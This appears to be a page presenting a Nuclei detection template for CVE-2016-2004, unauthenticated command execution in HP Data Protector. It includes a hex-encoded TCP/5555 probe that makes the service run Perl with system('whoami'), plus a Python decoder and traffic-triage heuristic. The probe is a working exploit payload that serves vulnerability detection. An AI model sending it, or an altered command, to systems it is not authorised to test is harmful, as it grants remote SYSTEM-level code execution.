HP Data Protector - Arbitrary Command Execution

ID: CVE-2016-2004

Severity: critical

Author: pussycat0x

Tags: packetstorm,cve,cve2016,network,iot,hp,rce,edb,tcp

HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.

id: CVE-2016-2004
info:
  name: HP Data Protector - Arbitrary Command Execution
  author: pussycat0x
  severity: critical
  description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands with the privileges of the Data Protector service account.
  remediation: |
    Upgrade to the most recent version of HP Data Protector.
  reference:
    - https://www.exploit-db.com/exploits/39858
    - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
    - http://www.kb.cert.org/vuls/id/267328
    - https://www.exploit-db.com/exploits/39858/
    - http://packetstormsecurity.com/files/137199/HP-Data-Protector-A.09.00-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-2004
    cwe-id: CWE-306
    epss-score: 0.12552
    epss-percentile: 0.95291
    cpe: cpe:2.3:a:hp:data_protector:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: hp
    product: data_protector
  tags: packetstorm,cve,cve2016,network,iot,hp,rce,edb,tcp
tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:5555"
    inputs:
      - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
        type: hex
    matchers:
      - type: word
        encoding: hex
        words:
          - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
# digest: 4b0a00483046022100be1a48335bdd5124d736a557f46bd8f52fe762df2f503c55f9a0518a981fb7dc022100d60b859cd742686882c4b67f119b9a6d6232196f541d50110a37c468d904ccc7:922c64590222798bb761d5b6d8e72950

This is a Nuclei network (TCP) template: it sends the hex-encoded input to the listed hosts, including port 5555, and reports a match when the reply contains the hex-encoded word given in the matcher. Run it with the Nuclei tool:

$ nuclei -u "URL" -t "network/cves/2016/CVE-2016-2004.yaml"
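
To see what the template's two hex strings contain, the following added example (not part of the template or the Nuclei project) decodes them and applies a triage check to captured TCP/5555 payloads. Reading the first four bytes as a big-endian length is an inference from the bytes themselves, and `matches_probe_shape` is a hypothetical heuristic covering only this template's probe shape.

```python
import struct

# Hex strings copied verbatim from the template's `inputs` and `matchers` fields.
PROBE_HEX = "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900"
MATCH_HEX = "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000"


def split_frame(raw: bytes) -> bytes:
    """Return the body of a frame whose first 4 bytes are its big-endian length.

    Assumption: the length-prefix reading is inferred from the two strings
    above (0x34 == 52 == body length in both); the page does not document it."""
    if len(raw) < 4:
        raise ValueError("frame shorter than the length prefix")
    (declared,) = struct.unpack(">I", raw[:4])
    if declared != len(raw) - 4:
        raise ValueError(f"declared {declared} bytes, got {len(raw) - 4}")
    return raw[4:]


def printable_fields(raw: bytes) -> list[str]:
    """NUL-separated request fields that are entirely printable ASCII."""
    fields = split_frame(raw).split(b"\x00")
    return [f.decode("ascii") for f in fields if f and all(0x20 <= b < 0x7F for b in f)]


def response_text(raw: bytes) -> str:
    """Decode a reply body that starts with a UTF-16LE byte-order mark."""
    body = split_frame(raw)
    if body[:2] != b"\xff\xfe":
        raise ValueError("no UTF-16LE BOM")
    return body[2:].decode("utf-16-le").replace("\x00", "").strip()


def matches_probe_shape(payload: bytes) -> bool:
    """Triage heuristic for captured TCP/5555 payloads: a well-formed frame
    naming perl.exe followed by a -e argument, as in this template's probe."""
    try:
        fields = printable_fields(payload)
    except ValueError:
        return False
    return any(a.lower().endswith("perl.exe") and b.lstrip().startswith("-e")
               for a, b in zip(fields, fields[1:]))


if __name__ == "__main__":
    print(printable_fields(bytes.fromhex(PROBE_HEX)))
    print(repr(response_text(bytes.fromhex(MATCH_HEX))))
```

The decoded request ends in the `\perl.exe` and `-esystem('whoami')` fields, and the matcher is the UTF-16LE text `nt authority\system`, which agrees with the `# whoami` and `# authority\system` comments in the template.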